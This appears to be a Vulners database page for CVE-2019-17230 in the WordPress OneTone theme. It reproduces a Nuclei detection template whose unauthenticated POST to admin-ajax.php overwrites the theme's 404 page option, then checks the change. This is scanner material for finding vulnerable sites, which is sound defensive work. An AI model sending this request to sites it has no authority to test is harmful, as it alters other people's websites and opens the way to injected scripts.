Lucene search
K

WordPress OneTone theme <= 3.0.6 – Unauthenticated Options Changes

🗓️ 06 Jul 2026 03:02:03Reported by ProjectDiscoveryType 
nuclei
 nuclei
🔗 github.com👁 7 Views

WordPress OneTone theme up to version 3.0.6 allows unauthenticated changes to options.

Related
Refs
Code
ReporterTitlePublishedViews
Family
Circl
CVE-2019-17230
3 Apr 202019:28
circl
CNVD
WordPress OneTone theme unauthorized operation vulnerability
7 Apr 202000:00
cnvd
CVE
CVE-2019-17230
3 Apr 202014:16
cve
Cvelist
CVE-2019-17230
3 Apr 202014:16
cvelist
EUVD
EUVD-2019-7647
3 Apr 202014:16
euvd
NVD
CVE-2019-17230
3 Apr 202015:15
nvd
OSV
CVE-2019-17230
3 Apr 202015:15
osv
Patchstack
WordPress OneTone theme <= 3.0.6 - Unauthenticated options change vulnerability
3 Apr 202000:00
patchstack
Prion
Design/Logic Flaw
3 Apr 202015:15
prion
RedhatCVE
CVE-2019-17230
22 May 202508:13
redhatcve
Rows per page
id: CVE-2019-17230

info:
  name: WordPress OneTone theme <= 3.0.6 – Unauthenticated Options Changes
  author: daffainfo
  severity: medium
  description: |
    includes/theme-functions.php in the OneTone theme through 3.0.6 for WordPress allows unauthenticated options changes.
  impact: |
    Unauthenticated attackers can modify WordPress theme options, potentially changing site content like 404 page messages to inject malicious content or alter site behavior.
  remediation: |
    Update the OneTone theme to version 3.0.7 or later, or switch to a different theme.
  reference:
    - https://blog.sucuri.net/2020/04/onetone-vulnerability-leads-to-javascript-cookie-hijacking.html
    - https://blog.nintechnet.com/unauthenticated-stored-xss-vulnerability-in-wordpress-onetone-theme-unpatched/
    - https://nvd.nist.gov/vuln/detail/CVE-2019-17230
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N
    cvss-score: 5.3
    cve-id: CVE-2019-17230
    epss-score: 0.02362
    epss-percentile: 0.81733
    cpe: cpe:2.3:a:mageewp:onetone:*:*:*:*:*:wordpress:*:*
  metadata:
    verified: true
    max-request: 1
    vendor: mageewp
    product: onetone
    framework: wordpress
    publicwww-query: "/wp-content/themes/onetone"
  tags: cve,cve2019,wordpress,wp-theme,wp,onetone,vkev,vuln

flow: http(1) && http(2)

variables:
  page: "{{rand_base(8)}}"

http:
  - raw:
      - |
        POST /wp-admin/admin-ajax.php HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded

        action=onetone_options_import&options={"content_404":"{{page}}"}

    matchers:
      - type: dsl
        dsl:
          - 'status_code == 200'
          - 'contains(content_type, "text/html")'
          - 'contains(body, "Import successful.")'
        condition: and
        internal: true

  - raw:
      - |
        GET /{{randstr}} HTTP/1.1
        Host: {{Hostname}}

    matchers:
      - type: dsl
        dsl:
          - 'status_code == 404'
          - 'contains(content_type, "text/html")'
          - 'contains_all(body, "<div class=\"page-content\">","{{page}}")'
        condition: and
# digest: 4a0a00473045022100d95ac350b8db94c13d1f007745aa2b662d8e52147a1271b1802286ab1e4e790702202a2eb62478a34508312ab4da5ccdf7288cfabe39aa7499460f1542ec5a3f4679:922c64590222798bb761d5b6d8e72950

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

04 Feb 2026 07:00Current
6.1Medium risk
Vulners AI Score6.1
CVSS 25
CVSS 3.15.3
EPSS0.02362
7